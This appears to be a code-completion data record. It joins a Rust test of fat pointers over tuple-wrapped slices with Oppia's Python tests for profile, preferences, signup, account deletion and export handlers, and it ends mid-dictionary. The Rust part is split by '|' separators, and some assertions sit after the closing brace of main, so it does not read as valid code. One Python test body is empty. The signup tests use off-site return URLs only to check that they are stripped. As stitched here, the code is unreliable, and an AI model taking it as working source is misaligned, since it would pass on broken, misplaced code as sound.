type Fat<T: ?Sized> = (isize, &'static str, T);
// x is a fat pointer
fn foo(x: &Fat<[isize]>) {
let y = &x.2;
assert_eq!(x.2.len(), 3);
assert_eq!(y[0], 1); | assert_eq!(x.1, "some str");
}
fn foo2<T:ToBar>(x: &Fat<[T]>) {
let y = &x.2;
let bar = Bar;
assert_eq!(x.2.len(), 3);
assert_eq!(y[0].to_bar(), bar);
assert_eq!(x.2[1].to_bar(), bar);
assert_eq!(x.0, 5);
assert_eq!(x.1, "some str");
}
fn foo3(x: &Fat<Fat<[isize]>>) {
let y = &(x.2).2;
assert_eq!(x.0, 5);
assert_eq!(x.1, "some str");
assert_eq!((x.2).0, 8);
assert_eq!((x.2).1, "deep str");
assert_eq!((x.2).2.len(), 3);
assert_eq!(y[0], 1);
assert_eq!((x.2).2[1], 2);
}
#[derive(Copy, Clone, PartialEq, Eq, Debug)]
struct Bar;
trait ToBar {
fn to_bar(&self) -> Bar;
}
impl ToBar for Bar {
fn to_bar(&self) -> Bar {
*self
}
}
pub fn main() {
// With a vec of ints.
let f1 = (5, "some str", [1, 2, 3]);
foo(&f1);
let f2 = &f1;
foo(f2);
let f3: &Fat<[isize]> = f2;
foo(f3);
let f4: &Fat<[isize]> = &f1;
foo(f4);
let f5: &Fat<[isize]> = &(5, "some str", [1, 2, 3]);
foo(f5);
// With a vec of Bars.
let bar = Bar;
let f1 = (5, "some str", [bar, bar, bar]);
foo2(&f1);
let f2 = &f1;
foo2(f2);
let f3: &Fat<[Bar]> = f2;
foo2(f3);
let f4: &Fat<[Bar]> = &f1;
foo2(f4);
let f5: &Fat<[Bar]> = &(5, "some str", [bar, bar, bar]);
foo2(f5);
// Assignment.
let f5: &mut Fat<[isize]> = &mut (5, "some str", [1, 2, 3]);
f5.2[1] = 34;
assert_eq!(f5.2[0], 1);
assert_eq!(f5.2[1], 34);
assert_eq!(f5.2[2], 3);
// Zero size vec.
let f5: &Fat<[isize]> = &(5, "some str", []);
assert!(f5.2.is_empty());
let f5: &Fat<[Bar]> = &(5, "some str", []);
assert!(f5.2.is_empty());
// Deeply nested.
let f1 = (5, "some str", (8, "deep str", [1, 2, 3]));
foo3(&f1);
let f2 = &f1;
foo3(f2);
let f3: &Fat<Fat<[isize]>> = f2;
foo3(f3);
let f4: &Fat<Fat<[isize]>> = &f1;
foo3(f4);
let f5: &Fat<Fat<[isize]>> = &(5, "some str", (8, "deep str", [1, 2, 3]));
foo3(f5);
// Box.
let f1 = Box::new([1, 2, 3]);
assert_eq!((*f1)[1], 2);
let f2: Box<[isize]> = f1;
assert_eq!((*f2)[1], 2);
// Nested Box.
let f1 : Box<Fat<[isize; 3]>> = box (5, "some str", [1, 2, 3]);
foo(&*f1);
let f2 : Box<Fat<[isize]>> = f1;
foo(&*f2);
let f3 : Box<Fat<[isize]>> =
Box::<Fat<[_; 3]>>::new((5, "some str", [1, 2, 3]));
foo(&*f3);
} | assert_eq!(x.2[1], 2);
assert_eq!(x.0, 5); |
profile_test.py | # Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the profile page."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import datetime
import re
from constants import constants
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import rights_manager
from core.domain import subscription_services
from core.domain import user_services
from core.platform import models
from core.tests import test_utils
import feconf
import utils
(user_models,) = models.Registry.import_models([models.NAMES.user])
class ProfilePageTests(test_utils.GenericTestBase):
def test_get_profile_page_of_non_existing_user_raises_status_404(self):
self.get_html_response(
'/profile/%s' % self.OWNER_USERNAME, expected_status_int=404)
def test_get_profile_page_of_existing_user(self):
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
response = self.get_html_response('/profile/%s' % self.OWNER_USERNAME)
self.assertIn(
'<profile-page></profile-page>', response.body)
class ProfileDataHandlerTests(test_utils.GenericTestBase):
def test_preference_page_updates(self):
self.signup(self.EDITOR_EMAIL, username=self.EDITOR_USERNAME)
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
original_preferences = self.get_json('/preferenceshandler/data')
self.assertEqual(
['en'], original_preferences['preferred_language_codes'])
self.assertIsNone(original_preferences['preferred_site_language_code'])
self.assertIsNone(original_preferences['preferred_audio_language_code'])
self.put_json(
'/preferenceshandler/data',
{'update_type': 'preferred_site_language_code', 'data': 'en'},
csrf_token=csrf_token)
self.put_json(
'/preferenceshandler/data',
{'update_type': 'preferred_audio_language_code', 'data': 'hi-en'},
csrf_token=csrf_token)
self.put_json(
'/preferenceshandler/data',
{'update_type': 'preferred_language_codes', 'data': ['de']},
csrf_token=csrf_token)
new_preferences = self.get_json('/preferenceshandler/data')
self.assertEqual(new_preferences['preferred_language_codes'], ['de'])
self.assertEqual(new_preferences['preferred_site_language_code'], 'en')
self.assertEqual(
new_preferences['preferred_audio_language_code'], 'hi-en')
def test_profile_data_is_independent_of_currently_logged_in_user(self):
self.signup(self.EDITOR_EMAIL, username=self.EDITOR_USERNAME)
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.put_json(
'/preferenceshandler/data',
{'update_type': 'user_bio', 'data': 'My new editor bio'},
csrf_token=csrf_token)
self.put_json(
'/preferenceshandler/data',
{'update_type': 'subject_interests', 'data': ['editor', 'editing']},
csrf_token=csrf_token)
self.logout()
self.signup(self.VIEWER_EMAIL, username=self.VIEWER_USERNAME)
self.login(self.VIEWER_EMAIL)
csrf_token = self.get_new_csrf_token()
self.put_json(
'/preferenceshandler/data',
{'update_type': 'user_bio', 'data': 'My new viewer bio'},
csrf_token=csrf_token)
self.put_json(
'/preferenceshandler/data',
{'update_type': 'subject_interests', 'data': ['viewer', 'viewing']},
csrf_token=csrf_token)
self.logout()
# Viewer looks at editor's profile page.
self.login(self.VIEWER_EMAIL)
response = self.get_json(
'/profilehandler/data/%s' % self.EDITOR_USERNAME)
self.assertEqual(response['user_bio'], 'My new editor bio')
self.assertEqual(response['subject_interests'], ['editor', 'editing'])
self.logout()
# Editor looks at their own profile page.
self.login(self.EDITOR_EMAIL)
response = self.get_json(
'/profilehandler/data/%s' % self.EDITOR_USERNAME)
self.assertEqual(response['user_bio'], 'My new editor bio')
self.assertEqual(response['subject_interests'], ['editor', 'editing'])
self.logout()
# Looged-out user looks at editor's profile page.
response = self.get_json(
'/profilehandler/data/%s' % self.EDITOR_USERNAME)
self.assertEqual(response['user_bio'], 'My new editor bio')
self.assertEqual(response['subject_interests'], ['editor', 'editing'])
def test_preferences_page(self):
self.signup(self.EDITOR_EMAIL, username=self.EDITOR_USERNAME)
self.login(self.EDITOR_EMAIL)
response = self.get_html_response(feconf.PREFERENCES_URL)
self.assertIn('{"title": "Preferences - Oppia"})', response.body)
self.logout()
class UserContributionsTests(test_utils.GenericTestBase):
USERNAME_A = 'a'
EMAIL_A = '[email protected]'
USERNAME_B = 'b'
EMAIL_B = '[email protected]'
EXP_ID_1 = 'exp_id_1'
def test_null_case(self):
# Check that the profile page for a user with no contributions shows
# that they have 0 created/edited explorations.
self.signup(self.EMAIL_A, self.USERNAME_A)
response_dict = self.get_json(
'/profilehandler/data/%s' % self.USERNAME_A)
self.assertEqual(
response_dict['created_exp_summary_dicts'], [])
self.assertEqual(
response_dict['edited_exp_summary_dicts'], [])
def test_created(self):
# Check that the profile page for a user who has created
# a single exploration shows 1 created and 1 edited exploration.
self.signup(self.EMAIL_A, self.USERNAME_A)
user_a_id = self.get_user_id_from_email(self.EMAIL_A)
user_a = user_services.UserActionsInfo(user_a_id)
self.save_new_valid_exploration(
self.EXP_ID_1, user_a_id, end_state_name='End')
rights_manager.publish_exploration(user_a, self.EXP_ID_1)
response_dict = self.get_json(
'/profilehandler/data/%s' % self.USERNAME_A)
self.assertEqual(len(
response_dict['created_exp_summary_dicts']), 1)
self.assertEqual(len(
response_dict['edited_exp_summary_dicts']), 1)
self.assertEqual(
response_dict['created_exp_summary_dicts'][0]['id'],
self.EXP_ID_1)
self.assertEqual(
response_dict['edited_exp_summary_dicts'][0]['id'],
self.EXP_ID_1)
def test_edited(self):
# Check that the profile page for a user who has created
# a single exploration shows 0 created and 1 edited exploration.
self.signup(self.EMAIL_A, self.USERNAME_A)
user_a_id = self.get_user_id_from_email(self.EMAIL_A)
self.signup(self.EMAIL_B, self.USERNAME_B)
user_b_id = self.get_user_id_from_email(self.EMAIL_B)
user_a = user_services.UserActionsInfo(user_a_id)
self.save_new_valid_exploration(
self.EXP_ID_1, user_a_id, end_state_name='End')
rights_manager.publish_exploration(user_a, self.EXP_ID_1)
exp_services.update_exploration(
user_b_id, self.EXP_ID_1, [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'objective',
'new_value': 'the objective'
})], 'Test edit')
response_dict = self.get_json(
'/profilehandler/data/%s' % self.USERNAME_B)
self.assertEqual(len(
response_dict['created_exp_summary_dicts']), 0)
self.assertEqual(len(
response_dict['edited_exp_summary_dicts']), 1)
self.assertEqual(
response_dict['edited_exp_summary_dicts'][0]['id'],
self.EXP_ID_1)
self.assertEqual(
response_dict['edited_exp_summary_dicts'][0]['objective'],
'the objective')
class FirstContributionDateTests(test_utils.GenericTestBase):
USERNAME = 'abc123'
EMAIL = '[email protected]'
def test_contribution_msec(self):
# Test the contribution time shows up correctly as None.
self.signup(self.EMAIL, self.USERNAME)
self.login(self.EMAIL)
user_id = self.get_user_id_from_email(self.EMAIL)
response_dict = self.get_json(
'/profilehandler/data/%s' % self.USERNAME)
self.assertIsNone(response_dict['first_contribution_msec'])
# Update the first_contribution_msec to the current time in
# milliseconds.
first_time_in_msecs = utils.get_current_time_in_millisecs()
user_services.update_first_contribution_msec_if_not_set(
user_id, first_time_in_msecs)
# Test the contribution date correctly changes to current_time_in_msecs.
response_dict = self.get_json(
'/profilehandler/data/%s' % self.USERNAME)
self.assertEqual(
response_dict['first_contribution_msec'],
first_time_in_msecs)
# Test that the contribution date is not changed after the first time it
# is set.
second_time_in_msecs = utils.get_current_time_in_millisecs()
user_services.update_first_contribution_msec_if_not_set(
user_id, second_time_in_msecs)
response_dict = self.get_json(
'/profilehandler/data/%s' % self.USERNAME)
self.assertEqual(
response_dict['first_contribution_msec'],
first_time_in_msecs)
class PreferencesHandlerTests(test_utils.GenericTestBase):
EXP_ID = 'exp_id'
EXP_TITLE = 'Exploration title'
def setUp(self):
super(PreferencesHandlerTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.VIEWER_EMAIL, self.VIEWER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.viewer_id = self.get_user_id_from_email(self.VIEWER_EMAIL)
def test_can_see_subscriptions(self):
self.login(self.VIEWER_EMAIL)
response = self.get_json(feconf.PREFERENCES_DATA_URL)
self.assertEqual(len(response['subscription_list']), 0)
# Subscribe to user.
subscription_services.subscribe_to_creator(
self.viewer_id, self.owner_id)
response = self.get_json(feconf.PREFERENCES_DATA_URL)
self.assertEqual(len(response['subscription_list']), 1)
self.assertEqual(
response['subscription_list'][0]['creator_username'],
self.OWNER_USERNAME)
# Unsubscribe from user.
subscription_services.unsubscribe_from_creator(
self.viewer_id, self.owner_id)
response = self.get_json(feconf.PREFERENCES_DATA_URL)
self.assertEqual(len(response['subscription_list']), 0)
self.logout()
def test_can_update_profile_picture_data_url(self):
self.login(self.OWNER_EMAIL)
csrf_token = self.get_new_csrf_token()
user_settings = user_services.get_user_settings(self.owner_id)
self.assertTrue(
user_settings.profile_picture_data_url.startswith(
'data:image/png;'))
self.put_json(
feconf.PREFERENCES_DATA_URL,
payload={'update_type': 'profile_picture_data_url',
'data': 'new_profile_picture_data_url'},
csrf_token=csrf_token)
user_settings = user_services.get_user_settings(self.owner_id)
self.assertEqual(
user_settings.profile_picture_data_url,
'new_profile_picture_data_url')
self.logout()
def test_can_update_default_dashboard(self):
self.login(self.OWNER_EMAIL)
csrf_token = self.get_new_csrf_token()
user_settings = user_services.get_user_settings(self.owner_id)
self.assertIsNone(user_settings.default_dashboard)
self.put_json(
feconf.PREFERENCES_DATA_URL,
payload={'update_type': 'default_dashboard',
'data': constants.DASHBOARD_TYPE_CREATOR},
csrf_token=csrf_token)
user_settings = user_services.get_user_settings(self.owner_id)
self.assertEqual(
user_settings.default_dashboard, constants.DASHBOARD_TYPE_CREATOR)
self.logout()
def test_update_preferences_with_invalid_update_type_raises_exception(self):
self.login(self.OWNER_EMAIL)
csrf_token = self.get_new_csrf_token()
with self.assertRaisesRegexp(Exception, 'Invalid update type:'):
self.put_json(
feconf.PREFERENCES_DATA_URL,
payload={'update_type': 'invalid_update_type'},
csrf_token=csrf_token)
self.logout()
class LongUserBioHandlerTests(test_utils.GenericTestBase):
USERNAME_A = 'a'
EMAIL_A = '[email protected]'
USERNAME_B = 'b'
EMAIL_B = '[email protected]'
def test_userbio_within_limit(self):
self.signup(self.EMAIL_A, self.USERNAME_A)
self.login(self.EMAIL_A)
csrf_token = self.get_new_csrf_token()
self.put_json(
'/preferenceshandler/data', {
'update_type': 'user_bio',
'data': 'I am within 2000 char limit',
}, csrf_token=csrf_token)
preferences = self.get_json('/preferenceshandler/data')
self.assertIsNotNone(preferences)
self.assertEqual(
preferences['user_bio'], 'I am within 2000 char limit')
self.logout()
def test_user_bio_exceeds_limit(self):
self.signup(self.EMAIL_B, self.USERNAME_B)
self.login(self.EMAIL_B)
csrf_token = self.get_new_csrf_token()
user_bio_response = self.put_json(
'/preferenceshandler/data', {
'update_type': 'user_bio',
'data': 'I am not within 2000 char limit' * 200
},
csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(user_bio_response['status_code'], 400)
self.assertIn('User bio exceeds maximum character limit: 2000',
user_bio_response['error'])
self.logout()
class ProfileLinkTests(test_utils.GenericTestBase):
USERNAME = 'abc123'
EMAIL = '[email protected]'
PROFILE_PIC_URL = '/preferenceshandler/profile_picture_by_username/'
def test_get_profile_picture_invalid_username(self):
self.get_json(
'%s%s' % (self.PROFILE_PIC_URL, self.USERNAME),
expected_status_int=404)
def test_get_profile_picture_valid_username(self):
self.signup(self.EMAIL, self.USERNAME)
response_dict = self.get_json(
'%s%s' % (self.PROFILE_PIC_URL, self.USERNAME)
)
# Every user must have a profile picture.
self.assertEqual(
response_dict['profile_picture_data_url_for_username'],
user_services.DEFAULT_IDENTICON_DATA_URL)
class EmailPreferencesTests(test_utils.GenericTestBase):
def test_user_not_setting_email_prefs_on_signup(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
feconf.SIGNUP_DATA_URL,
{'username': 'abc', 'agreed_to_terms': True},
csrf_token=csrf_token)
# The email update preference should be whatever the setting in feconf
# is.
editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
with self.swap(feconf, 'DEFAULT_EMAIL_UPDATES_PREFERENCE', True):
email_preferences = user_services.get_email_preferences(editor_id)
self.assertEqual(email_preferences.can_receive_email_updates, True)
self.assertEqual(
email_preferences.can_receive_editor_role_email,
feconf.DEFAULT_EDITOR_ROLE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_feedback_message_email,
feconf.DEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_subscription_email,
feconf.DEFAULT_SUBSCRIPTION_EMAIL_PREFERENCE)
with self.swap(feconf, 'DEFAULT_EMAIL_UPDATES_PREFERENCE', False):
email_preferences = user_services.get_email_preferences(editor_id)
self.assertEqual(email_preferences.can_receive_email_updates, False)
self.assertEqual(
email_preferences.can_receive_editor_role_email,
feconf.DEFAULT_EDITOR_ROLE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_feedback_message_email,
feconf.DEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_subscription_email,
feconf.DEFAULT_SUBSCRIPTION_EMAIL_PREFERENCE)
def test_user_allowing_emails_on_signup(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
feconf.SIGNUP_DATA_URL,
{'username': 'abc', 'agreed_to_terms': True,
'can_receive_email_updates': True},
csrf_token=csrf_token)
# The email update preference should be True in all cases.
editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
with self.swap(feconf, 'DEFAULT_EMAIL_UPDATES_PREFERENCE', True):
email_preferences = user_services.get_email_preferences(editor_id)
self.assertEqual(email_preferences.can_receive_email_updates, True)
self.assertEqual(
email_preferences.can_receive_editor_role_email,
feconf.DEFAULT_EDITOR_ROLE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_feedback_message_email,
feconf.DEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_subscription_email,
feconf.DEFAULT_SUBSCRIPTION_EMAIL_PREFERENCE)
with self.swap(feconf, 'DEFAULT_EMAIL_UPDATES_PREFERENCE', False):
email_preferences = user_services.get_email_preferences(editor_id)
self.assertEqual(email_preferences.can_receive_email_updates, True)
self.assertEqual(
email_preferences.can_receive_editor_role_email,
feconf.DEFAULT_EDITOR_ROLE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_feedback_message_email,
feconf.DEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_subscription_email,
feconf.DEFAULT_SUBSCRIPTION_EMAIL_PREFERENCE)
def test_user_disallowing_emails_on_signup(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
feconf.SIGNUP_DATA_URL,
{'username': 'abc', 'agreed_to_terms': True,
'can_receive_email_updates': False},
csrf_token=csrf_token)
# The email update preference should be False in all cases.
editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
with self.swap(feconf, 'DEFAULT_EMAIL_UPDATES_PREFERENCE', True):
email_preferences = user_services.get_email_preferences(editor_id)
self.assertEqual(email_preferences.can_receive_email_updates, False)
self.assertEqual(
email_preferences.can_receive_editor_role_email,
feconf.DEFAULT_EDITOR_ROLE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_feedback_message_email,
feconf.DEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_subscription_email,
feconf.DEFAULT_SUBSCRIPTION_EMAIL_PREFERENCE)
with self.swap(feconf, 'DEFAULT_EMAIL_UPDATES_PREFERENCE', False):
email_preferences = user_services.get_email_preferences(editor_id)
self.assertEqual(email_preferences.can_receive_email_updates, False)
self.assertEqual(
email_preferences.can_receive_editor_role_email,
feconf.DEFAULT_EDITOR_ROLE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_feedback_message_email,
feconf.DEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE)
self.assertEqual(
email_preferences.can_receive_subscription_email,
feconf.DEFAULT_SUBSCRIPTION_EMAIL_PREFERENCE)
def test_email_preferences_updates(self):
"""Test that Preferences Handler correctly updates the email
preferences of the user.
"""
self.signup(self.EDITOR_EMAIL, username=self.EDITOR_USERNAME)
editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
payload = {
'update_type': 'email_preferences',
'data': {
'can_receive_email_updates': True,
'can_receive_editor_role_email': True,
'can_receive_feedback_message_email': True,
'can_receive_subscription_email': True
}
}
# Allow all emails.
self.put_json(
'/preferenceshandler/data', payload, csrf_token=csrf_token)
email_preferences = user_services.get_email_preferences(editor_id)
self.assertTrue(email_preferences.can_receive_email_updates)
self.assertTrue(email_preferences.can_receive_editor_role_email)
self.assertTrue(email_preferences.can_receive_feedback_message_email)
self.assertTrue(email_preferences.can_receive_subscription_email)
payload = {
'update_type': 'email_preferences',
'data': {
'can_receive_email_updates': False,
'can_receive_editor_role_email': False,
'can_receive_feedback_message_email': False,
'can_receive_subscription_email': False
}
}
# Disallow all emails.
self.put_json(
'/preferenceshandler/data', payload, csrf_token=csrf_token)
email_preferences = user_services.get_email_preferences(editor_id)
self.assertFalse(email_preferences.can_receive_email_updates)
self.assertFalse(email_preferences.can_receive_editor_role_email)
self.assertFalse(email_preferences.can_receive_feedback_message_email)
self.assertFalse(email_preferences.can_receive_subscription_email)
class ProfilePictureHandlerTests(test_utils.GenericTestBase):
def test_get_profile_picture_with_updated_value(self):
self.get_json(
'/preferenceshandler/profile_picture', expected_status_int=401)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.login(self.OWNER_EMAIL)
user_settings = user_services.get_user_settings(owner_id)
response = self.get_json('/preferenceshandler/profile_picture')
self.assertEqual(
response['profile_picture_data_url'],
user_settings.profile_picture_data_url)
user_services.update_profile_picture_data_url(
owner_id, 'new_profile_picture')
response = self.get_json('/preferenceshandler/profile_picture')
self.assertEqual(
response['profile_picture_data_url'], 'new_profile_picture')
self.logout()
class SignupTests(test_utils.GenericTestBase):
def test_signup_page_does_not_have_top_right_menu(self):
self.login(self.EDITOR_EMAIL)
response = self.get_html_response(feconf.SIGNUP_URL)
# Sign in can't be inside an html tag, but can appear inside js code.
response.mustcontain(no=['Logout'])
self.logout()
def test_going_somewhere_else_while_signing_in_logs_user_out(self):
exp_services.load_demo('0')
self.login(self.EDITOR_EMAIL)
response = self.get_html_response(feconf.SIGNUP_URL)
response = self.get_html_response('/create/0', expected_status_int=302)
self.assertIn('logout', response.headers['location'])
self.assertIn('create', response.headers['location'])
self.logout()
def test_to_check_url_redirection_in_signup(self):
"""To validate the redirections from return_url."""
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
# Registering this user fully.
self.post_json(
feconf.SIGNUP_DATA_URL,
{'username': 'abc', 'agreed_to_terms': True},
csrf_token=csrf_token)
def strip_domain_from_location_header(url):
"""To strip the domain form the location url."""
splitted_url = re.match(r'(http[s]?:\/\/)?([^\/\s]+\/)(.*)', url)
return splitted_url.group(3)
response = self.get_html_response(
'/signup?return_url=https://google.com', expected_status_int=302)
self.assertEqual('', strip_domain_from_location_header(
response.headers['location']))
response = self.get_html_response(
'/signup?return_url=//google.com', expected_status_int=302)
self.assertEqual('', strip_domain_from_location_header(
response.headers['location']))
response = self.get_html_response(
'/signup?return_url=/page#hello', expected_status_int=302)
self.assertEqual('page', strip_domain_from_location_header(
response.headers['location']))
response = self.get_html_response(
'/signup?return_url=/page/hello', expected_status_int=302)
self.assertEqual('page/hello', strip_domain_from_location_header(
response.headers['location']))
response = self.get_html_response(
'/signup?return_url=/page/hello?id=tests', expected_status_int=302)
self.assertEqual(
'page/hello?id=tests', strip_domain_from_location_header(
response.headers['location']))
self.logout()
def test_accepting_terms_is_handled_correctly(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
response_dict = self.post_json(
feconf.SIGNUP_DATA_URL, {'agreed_to_terms': False},
csrf_token=csrf_token, expected_status_int=400)
self.assertIn('you will need to accept', response_dict['error'])
response_dict = self.post_json(
feconf.SIGNUP_DATA_URL,
{'agreed_to_terms': 'Hasta la vista!'},
csrf_token=csrf_token, expected_status_int=400)
self.assertIn('you will need to accept', response_dict['error'])
self.post_json(
feconf.SIGNUP_DATA_URL,
{'agreed_to_terms': True, 'username': 'myusername'},
csrf_token=csrf_token)
self.logout()
def test_username_is_handled_correctly(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
response_dict = self.post_json(
feconf.SIGNUP_DATA_URL, {'agreed_to_terms': True},
csrf_token=csrf_token, expected_status_int=400)
self.assertIn('Empty username supplied', response_dict['error'])
response_dict = self.post_json(
feconf.SIGNUP_DATA_URL,
{'username': '', 'agreed_to_terms': True},
csrf_token=csrf_token, expected_status_int=400)
self.assertIn('Empty username supplied', response_dict['error'])
response_dict = self.post_json(
feconf.SIGNUP_DATA_URL,
{'username': '!a!', 'agreed_to_terms': True},
csrf_token=csrf_token, expected_status_int=400)
self.assertIn(
'can only have alphanumeric characters', response_dict['error'])
response_dict = self.post_json(
feconf.SIGNUP_DATA_URL,
{'username': self.UNICODE_TEST_STRING, 'agreed_to_terms': True},
csrf_token=csrf_token, expected_status_int=400)
self.assertIn(
'can only have alphanumeric characters', response_dict['error'])
response_dict = self.post_json(
feconf.SIGNUP_DATA_URL,
{'username': 'abcde', 'agreed_to_terms': True},
csrf_token=csrf_token)
self.logout()
def test_default_dashboard_for_new_users(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
# This user should have the creator dashboard as default.
self.post_json(
feconf.SIGNUP_DATA_URL,
{'agreed_to_terms': True, 'username': 'creatoruser',
'default_dashboard': constants.DASHBOARD_TYPE_CREATOR,
'can_receive_email_updates': None},
csrf_token=csrf_token)
user_id = user_services.get_user_id_from_username('creatoruser')
user_settings = user_services.get_user_settings(user_id)
self.assertEqual(
user_settings.default_dashboard, constants.DASHBOARD_TYPE_CREATOR)
self.logout()
self.login(self.VIEWER_EMAIL)
csrf_token = self.get_new_csrf_token()
# This user should have the learner dashboard as default.
self.post_json(
feconf.SIGNUP_DATA_URL,
{'agreed_to_terms': True, 'username': 'learneruser',
'default_dashboard': constants.DASHBOARD_TYPE_LEARNER,
'can_receive_email_updates': None},
csrf_token=csrf_token)
user_id = user_services.get_user_id_from_username('learneruser')
user_settings = user_services.get_user_settings(user_id)
self.assertEqual(
user_settings.default_dashboard, constants.DASHBOARD_TYPE_LEARNER)
self.logout()
def test_user_settings_of_non_existing_user(self):
self.login(self.OWNER_EMAIL)
values_dict = {
'can_send_emails': False,
'has_agreed_to_latest_terms': False,
'has_ever_registered': False,
'username': None,
}
response = self.get_json(feconf.SIGNUP_DATA_URL)
self.assertDictEqual(values_dict, response)
self.logout()
def test_user_settings_of_existing_user(self):
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.login(self.OWNER_EMAIL)
values_dict = {
'can_send_emails': True,
'has_agreed_to_latest_terms': True,
'has_ever_registered': True,
'username': 'owner',
}
with self.swap(feconf, 'CAN_SEND_EMAILS', True):
response = self.get_json(feconf.SIGNUP_DATA_URL)
self.assertDictEqual(values_dict, response)
self.logout()
class DeleteAccountPageTests(test_utils.GenericTestBase):
def setUp(self):
super(DeleteAccountPageTests, self).setUp()
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.login(self.EDITOR_EMAIL)
def test_get_delete_account_page(self):
with self.swap(constants, 'ENABLE_ACCOUNT_DELETION', True):
response = self.get_html_response('/delete-account')
self.assertIn(
'<delete-account-page></delete-account-page>', response.body)
def test_get_delete_account_page_disabled(self):
with self.swap(constants, 'ENABLE_ACCOUNT_DELETION', False):
self.get_html_response('/delete-account', expected_status_int=404)
class DeleteAccountHandlerTests(test_utils.GenericTestBase):
def setUp(self):
super(DeleteAccountHandlerTests, self).setUp()
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.login(self.EDITOR_EMAIL)
def test_delete_delete_account_page(self):
|
def test_delete_delete_account_page_disabled(self):
with self.swap(constants, 'ENABLE_ACCOUNT_DELETION', False):
self.delete_json('/delete-account-handler', expected_status_int=404)
class ExportAccountHandlerTests(test_utils.GenericTestBase):
GENERIC_DATE = datetime.datetime(2019, 5, 20)
GENERIC_EPOCH = utils.get_time_in_millisecs(GENERIC_DATE)
def setUp(self):
super(ExportAccountHandlerTests, self).setUp()
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.login(self.EDITOR_EMAIL)
user_models.UserSubscriptionsModel(
id=self.get_user_id_from_email(self.EDITOR_EMAIL),
creator_ids=[],
collection_ids=[],
activity_ids=[],
general_feedback_thread_ids=[]).put()
def test_export_account_handler(self):
# Update user settings to constants.
user_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
user_settings = user_services.get_user_settings(user_id)
user_settings.last_agreed_to_terms = self.GENERIC_DATE
user_settings.last_logged_in = self.GENERIC_DATE
user_settings.validate()
user_models.UserSettingsModel(
id=user_settings.user_id,
gae_id=user_settings.gae_id,
email=user_settings.email,
role=user_settings.role,
username=user_settings.username,
normalized_username=user_settings.normalized_username,
last_agreed_to_terms=user_settings.last_agreed_to_terms,
last_started_state_editor_tutorial=(
user_settings.last_started_state_editor_tutorial),
last_started_state_translation_tutorial=(
user_settings.last_started_state_translation_tutorial),
last_logged_in=user_settings.last_logged_in,
last_edited_an_exploration=user_settings.last_edited_an_exploration,
last_created_an_exploration=(
user_settings.last_created_an_exploration),
profile_picture_data_url=user_settings.profile_picture_data_url,
default_dashboard=user_settings.default_dashboard,
creator_dashboard_display_pref=(
user_settings.creator_dashboard_display_pref),
user_bio=user_settings.user_bio,
subject_interests=user_settings.subject_interests,
first_contribution_msec=user_settings.first_contribution_msec,
preferred_language_codes=user_settings.preferred_language_codes,
preferred_site_language_code=(
user_settings.preferred_site_language_code),
preferred_audio_language_code=(
user_settings.preferred_audio_language_code),
deleted=user_settings.deleted
).put()
constants_swap = self.swap(constants, 'ENABLE_ACCOUNT_EXPORT', True)
time_swap = self.swap(
user_services, 'record_user_logged_in', lambda *args: None)
with constants_swap, time_swap:
data = self.get_json('/export-account-handler')
expected_data = {
u'topic_rights_data': {
u'managed_topic_ids': []
},
u'subtopic_page_snapshot_metadata_data': {},
u'general_voiceover_application_data': {},
